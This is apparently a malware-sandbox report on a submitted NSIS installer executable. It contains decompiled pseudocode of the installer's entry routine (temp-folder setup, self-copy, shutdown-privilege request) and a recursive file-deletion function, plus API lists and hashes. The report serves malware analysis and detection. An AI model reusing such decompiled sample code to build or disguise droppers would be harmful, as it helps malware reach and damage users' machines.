131->140 132->109 140->129
                            C-Code - Quality: 78%
                            			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x436800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", 0x436800);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t221);
												E00406668(0x436000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                            0x0040364e
                            0x0040364f
                            0x00403656
                            0x00403659
                            0x00403660
                            0x00403663
                            0x00403676
                            0x0040367c
                            0x0040367f
                            0x00403682
                            0x00403690
                            0x00403698
                            0x004036a3
                            0x004036bc
                            0x004036be
                            0x004036c6
                            0x004036c6
                            0x004036d1
                            0x004036d3
                            0x004036d3
                            0x004036e8
                            0x0040370d
                            0x0040371b
                            0x0040371e
                            0x00403725
                            0x0040372c
                            0x0040372c
                            0x00403725
                            0x0040372e
                            0x00403733
                            0x00403734
                            0x00403740
                            0x00403744
                            0x0040374b
                            0x00403759
                            0x0040375e
                            0x00403765
                            0x00403769
                            0x0040376d
                            0x0040376f
                            0x0040376f
                            0x0040376d
                            0x00403776
                            0x0040377d
                            0x00403783
                            0x0040379b
                            0x004037ab
                            0x004037b0
                            0x004037b6
                            0x004037bd
                            0x004037c4
                            0x004037c6
                            0x004037c7
                            0x004037d1
                            0x004037d8
                            0x004037da
                            0x004037dc
                            0x004037dc
                            0x004037ef
                            0x004037f1
                            0x004038eb
                            0x004038eb
                            0x004038ee
                            0x004038f1
                            0x00000000
                            0x00000000
                            0x004037fb
                            0x004037fc
                            0x004037ff
                            0x00403808
                            0x00403808
                            0x0040380b
                            0x0040380e
                            0x00403811
                            0x00403814
                            0x00403814
                            0x00403814
                            0x00403815
                            0x00403819
                            0x004038d9
                            0x004038e2
                            0x004038e4
                            0x004038e7
                            0x004038ea
                            0x004038ea
                            0x004038ea
                            0x00000000
                            0x0040381f
                            0x00403820
                            0x00403821
                            0x00403825
                            0x0040383f
                            0x00403846
                            0x00403859
                            0x0040385a
                            0x0040386f
                            0x00403874
                            0x00403876
                            0x00403878
                            0x00403894
                            0x0040389b
                            0x004038ae
                            0x004038af
                            0x004038c4
                            0x004038ca
                            0x004038cc
                            0x004038ce
                            0x004038d6
                            0x004038d8
                            0x00000000
                            0x004038d8
                            0x004038d2
                            0x004038d4
                            0x004038f9
                            0x004038fd
                            0x00403906
                            0x0040390b
                            0x00403911
                            0x0040391c
                            0x0040391e
                            0x00403923
                            0x00403925
                            0x0040397d
                            0x00403982
                            0x0040398b
                            0x00403992
                            0x00403995
                            0x00403b6c
                            0x00403b6c
                            0x00403b71
                            0x00403b7a
                            0x00403b97
                            0x00403c0f
                            0x00403c0f
                            0x00403c17
                            0x00403c19
                            0x00403c19
                            0x00403c1f
                            0x00403c1f
                            0x00403bae
                            0x00403bba
                            0x00403bcb
                            0x00403bd2
                            0x00403bd9
                            0x00403bd9
                            0x00403be1
                            0x00403bed
                            0x00403bfb
                            0x00403c06
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403bef
                            0x00403bef
                            0x00403bf0
                            0x00403bf2
                            0x00403bf3
                            0x00403bf4
                            0x00403bf9
                            0x00403c08
                            0x00403c0a
                            0x00000000
                            0x00403c0a
                            0x00000000
                            0x00403bf9
                            0x00403bed
                            0x00403b84
                            0x00403b8b
                            0x00403b8b
                            0x004039a1
                            0x00403a48
                            0x00403a48
                            0x00403a54
                            0x00000000
                            0x00403a54
                            0x004039b2
                            0x004039ba
                            0x00403a0c
                            0x00403a0c
                            0x00403a12
                            0x00403a19
                            0x00403a67
                            0x00403a69
                            0x00403a6e
                            0x00403a70
                            0x00403a78
                            0x00403a78
                            0x00403a83
                            0x00403a8f
                            0x00403a95
                            0x00403a97
                            0x00403b6a
                            0x00403b6a
                            0x00403b6a
                            0x00000000
                            0x00403a9d
                            0x00403a9d
                            0x00403a9f
                            0x00403aa0
                            0x00403aa9
                            0x00403aa2
                            0x00403aa2
                            0x00403aa2
                            0x00403aaf
                            0x00403ab7
                            0x00403abe
                            0x00403ac6
                            0x00403ac6
                            0x00403ad3
                            0x00403adf
                            0x00403ae9
                            0x00403ae9
                            0x00403aeb
                            0x00403af2
                            0x00403afc
                            0x00403b08
                            0x00403b0e
                            0x00403b14
                            0x00403b17
                            0x00403b21
                            0x00403b27
                            0x00403b29
                            0x00403b2d
                            0x00403b3e
                            0x00403b44
                            0x00403b49
                            0x00403b4b
                            0x00403b4e
                            0x00403b54
                            0x00403b54
                            0x00403b4b
                            0x00403b29
                            0x00403b57
                            0x00403b5e
                            0x00403b5e
                            0x00403b5e
                            0x00403b5e
                            0x00403b65
                            0x00000000
                            0x00403b65
                            0x00403a97
                            0x00403a1b
                            0x00403a1e
                            0x00403a22
                            0x00403a27
                            0x00403a29
                            0x00000000
                            0x00000000
                            0x00403a35
                            0x00403a40
                            0x00403a45
                            0x00000000
                            0x00403a45
                            0x004039c3
                            0x004039db
                            0x004039ec
                            0x004039ed
                            0x004039f1
                            0x004039f3
                            0x00403a01
                            0x00403a08
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403a08
                            0x00403a0a
                            0x00000000
                            0x00403a0a
                            0x0040392d
                            0x00403939
                            0x0040393e
                            0x00403943
                            0x00403945
                            0x00000000
                            0x00000000
                            0x0040394d
                            0x00403955
                            0x00403966
                            0x0040396e
                            0x00403970
                            0x00403975
                            0x00403977
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403977
                            0x00000000
                            0x004038d4
                            0x0040387d
                            0x0040387f
                            0x00000000
                            0x00000000
                            0x00403881
                            0x00403885
                            0x00403889
                            0x00403890
                            0x00403890
                            0x00403890
                            0x00403890
                            0x00000000
                            0x00403890
                            0x0040388b
                            0x0040388e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040388e
                            0x00403827
                            0x0040382b
                            0x0040382e
                            0x00403835
                            0x00403835
                            0x00000000
                            0x00403835
                            0x00403830
                            0x00403833
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403833
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403801
                            0x00403801
                            0x00403802
                            0x00403803
                            0x00403803
                            0x00000000
                            0x00403801
                            0x00000000

                            APIs
                            • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                            • GetVersionExW.KERNEL32(?), ref: 0040368C
                            • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                            • OleInitialize.OLE32(00000000), ref: 0040377D
                            • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                            • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\YSpCB8DEek.exe",00000020,"C:\Users\user\Desktop\YSpCB8DEek.exe",00000000), ref: 004037E9
                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                            • DeleteFileW.KERNELBASE(1033), ref: 00403982
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                              • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\YSpCB8DEek.exe",00000000,?), ref: 00403A8F
                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                            • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\YSpCB8DEek.exe,00420F08,00000001), ref: 00403B21
                            • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                            • ExitProcess.KERNEL32(?), ref: 00403B6C
                            • OleUninitialize.OLE32(?), ref: 00403B71
                            • ExitProcess.KERNEL32 ref: 00403B8B
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                            • ExitProcess.KERNEL32 ref: 00403C1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                            • String ID: "C:\Users\user\Desktop\YSpCB8DEek.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\YSpCB8DEek.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                            • API String ID: 2292928366-2509484867
                            • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                            • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                            • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                            • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                            C-Code - Quality: 98%
                            			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                            0x00405d7e
                            0x00405d83
                            0x00405d8c
                            0x00405d8f
                            0x00405d97
                            0x00405d9a
                            0x00405d9d
                            0x00405da5
                            0x00405da7
                            0x00405da8
                            0x00000000
                            0x00405da8
                            0x00405db3
                            0x00405db6
                            0x00405db6
                            0x00405db6
                            0x00405dba
                            0x00405dcd
                            0x00405dd4
                            0x00405dd9
                            0x00405ddd
                            0x00405ded
                            0x00405ddf
                            0x00405de5
                            0x00405de5
                            0x00405df2
                            0x00405df6
                            0x00405e02
                            0x00405e08
                            0x00405e0d
                            0x00405e13
                            0x00405e1e
                            0x00405e24
                            0x00405e26
                            0x00405e29
                            0x00405ed3
                            0x00405ed3
                            0x00405ed7
                            0x00405ed9
                            0x00405ed9
                            0x00405ed9
                            0x00405ed9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405e2f
                            0x00405e2f
                            0x00405e2f
                            0x00405e37
                            0x00405e57
                            0x00405e5f
                            0x00405e64
                            0x00405e6b
                            0x00405e86
                            0x00405e8b
                            0x00405e8d
                            0x00405eb1
                            0x00405e8f
                            0x00405e8f
                            0x00405e92
                            0x00405ea6
                            0x00405e94
                            0x00405e97
                            0x00405e9f
                            0x00405e9f
                            0x00405e92
                            0x00405e6d
                            0x00405e73
                            0x00405e75
                            0x00405e7b
                            0x00405e7b
